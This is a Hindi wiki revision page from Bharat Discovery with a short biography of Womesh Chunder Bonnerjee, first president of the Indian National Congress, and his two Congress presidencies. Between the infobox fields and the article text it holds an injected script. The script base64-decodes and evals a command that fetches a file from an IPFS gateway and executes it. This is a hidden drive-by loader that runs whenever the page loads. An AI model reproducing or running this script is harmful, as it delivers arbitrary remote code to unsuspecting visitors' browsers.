Difference between revisions of "व्योमेश चन्‍द्र बनर्जी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(16 intermediate revisions by 7 users not shown)
Line 1: Line 1:
वोमेश चन्‍द्र बनर्जी (जन्म- [[29 दिसंबर]], 1844, [[कोलकाता]]; मृत्यु- [[21 जुलाई]] [[1906]] [[इंग्लैंड]])। वोमेश चन्‍द्र बनर्जी [[भारतीय राष्ट्रीय कांग्रेस]] के प्रथम अध्यक्ष और [[कोलकाता]] उच्च न्यायालय के प्रमुख वक़ील थे। वे अंग्रेज़ी चाल-ढाल के कट्टर अनुयायी थे, अत: स्वयं अपने पारिवारिक नाम 'बनर्जी' का अंग्रेज़ीकरण करके उसे '''बोनर्जी''' कर दिया और अपने पुत्र का नाभ भी 'शेली' रखा, लेकिन [[ह्रदय]] से वे सच्चे भारतीय थे। इसलिए भारतीय राष्ट्रीय कांग्रेस के [[1885]] ई. में हुए प्रथम अधिवेशन के वे अध्यक्ष चुने गये। उन्हें दुबारा भी [[इलाहाबाद]] में [[1892]] ई. में हुए कांग्रेस अधिवेशन का अध्यक्ष बनाया गया। [[1902]] ई. में वे [[इंग्लैंड]] जाकर बस गये। [[1906]] ई. में अपनी मृत्यु पर्यन्त भारतीय राष्ट्रीय कांग्रेस के आंदोलन को बढ़ावा देते रहे।
+
{{सूचना बक्सा राजनीतिज्ञ
{{लेख प्रगति
+
|चित्र=Womesh Chunder Bonnerjee.jpg
|आधार=आधार1
+
|चित्र का नाम=व्योमेश चन्‍द्र बनर्जी
|प्रारम्भिक=
+
|पूरा नाम=व्योमेश चन्‍द्र बनर्जी
|माध्यमिक=
+
|अन्य नाम=
|पूर्णता=
+
|जन्म=[[29 दिसंबर]], 1844
|शोध=
+
|जन्म भूमि=कलकत्ता (अब [[कोलकाता]])
 +
|मृत्यु= [[21 जुलाई]] [[1906]]  
 +
|मृत्यु स्थान=[[इंग्लैंड]]
 +
|मृत्यु कारण=
 +
|अभिभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|स्मारक=
 +
|क़ब्र=
 +
|नागरिकता=भारतीय
 +
|प्रसिद्धि=उच्च न्यायालय के प्रमुख वक़ील
 +
|पार्टी=[[भारतीय राष्ट्रीय कांग्रेस]]  
 +
|पद=कांग्रेस के प्रथम अध्यक्ष  
 +
|भाषा=
 +
|जेल यात्रा=
 +
|कार्य काल=
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|विशेष योगदान=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=[[इलाहाबाद]] में [[1892]] ई. में हुए कांग्रेस अधिवेशन का अध्यक्ष बनाया गया था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 
}}
 
}}
 +
'''व्योमेश चन्‍द्र बनर्जी''' ([[अंग्रेज़ी]]: ''Womesh Chunder Bonnerjee'', जन्म- [[29 दिसंबर]], 1844, [[कोलकाता]]; मृत्यु- [[21 जुलाई]] [[1906]] [[इंग्लैंड]]) [[भारतीय राष्ट्रीय कांग्रेस]] के प्रथम अध्यक्ष और [[कोलकाता]] उच्च न्यायालय के प्रमुख वक़ील थे। ये [[भारत]] में [[अंग्रेज़ी शासन]] से प्रभावित थे और उसे देश के लिये अच्छा मानते थे।
 +
====अंग्रेज़ों के अनुयायी====
 +
व्योमेश बनर्जी अंग्रेज़ी चाल-ढाल के इतने कट्टर अनुयायी थे कि इन्होंने स्वयं अपने पारिवारिक नाम 'बनर्जी' का अंग्रेज़ीकरण करके उसे 'बोनर्जी' कर दिया। इन्होंने अपने पुत्र का नाम भी 'शेली' रखा, जो कि [[अंग्रेज़|अंग्रेज़ों]] में अधिक प्रचलित था। लेकिन इतना सब कुछ होने के बाद भी [[हृदय]] से वे सच्चे भारतीय थे।
 +
====अध्यक्ष====
 +
'भारतीय राष्ट्रीय कांग्रेस' के [[1885]] ई. में हुए प्रथम अधिवेशन के वे अध्यक्ष चुने गये थे। उन्हें दोबारा भी [[इलाहाबाद]] में [[1892]] ई. में हुए कांग्रेस अधिवेशन का अध्यक्ष बनाया गया था। [[1902]] ई. में वे [[इंग्लैंड]] जाकर बस गये। [[1906]] में अपनी मृत्यु पर्यन्त भारतीय राष्ट्रीय कांग्रेस के आंदोलन को ये बढ़ावा देते रहे।
 +
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{भारतीय राष्ट्रीय काँग्रेस के अध्यक्ष}}
 +
[[Category:भारतीय राष्ट्रीय काँग्रेस अध्यक्ष]][[Category:राजनीति कोश]][[Category:भारतीय राष्ट्रीय काँग्रेस]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 14:06, 14 July 2016

vyomesh chanh‍dr banarji
poora nam vyomesh chanh‍dr banarji
janm 29 disanbar, 1844
janm bhoomi kalakatta (ab kolakata)
mrityu 21 julaee 1906
mrityu sthan ianglaiand
nagarikata bharatiy
prasiddhi uchch nyayalay ke pramukh vaqil
parti bharatiy rashtriy kaangres
pad kaangres ke pratham adhyaksh
any janakari ilahabad mean 1892 ee. mean hue kaangres adhiveshan ka adhyaksh banaya gaya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vyomesh chanh‍dr banarji (aangrezi: Womesh Chunder Bonnerjee, janm- 29 disanbar, 1844, kolakata; mrityu- 21 julaee 1906 ianglaiand) bharatiy rashtriy kaangres ke pratham adhyaksh aur kolakata uchch nyayalay ke pramukh vaqil the. ye bharat mean aangrezi shasan se prabhavit the aur use desh ke liye achchha manate the.

aangrezoan ke anuyayi

vyomesh banarji aangrezi chal-dhal ke itane kattar anuyayi the ki inhoanne svayan apane parivarik nam 'banarji' ka aangrezikaran karake use 'bonarji' kar diya. inhoanne apane putr ka nam bhi 'sheli' rakha, jo ki aangrezoan mean adhik prachalit tha. lekin itana sab kuchh hone ke bad bhi hriday se ve sachche bharatiy the.

adhyaksh

'bharatiy rashtriy kaangres' ke 1885 ee. mean hue pratham adhiveshan ke ve adhyaksh chune gaye the. unhean dobara bhi ilahabad mean 1892 ee. mean hue kaangres adhiveshan ka adhyaksh banaya gaya tha. 1902 ee. mean ve ianglaiand jakar bas gaye. 1906 mean apani mrityu paryant bharatiy rashtriy kaangres ke aandolan ko ye badhava dete rahe.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh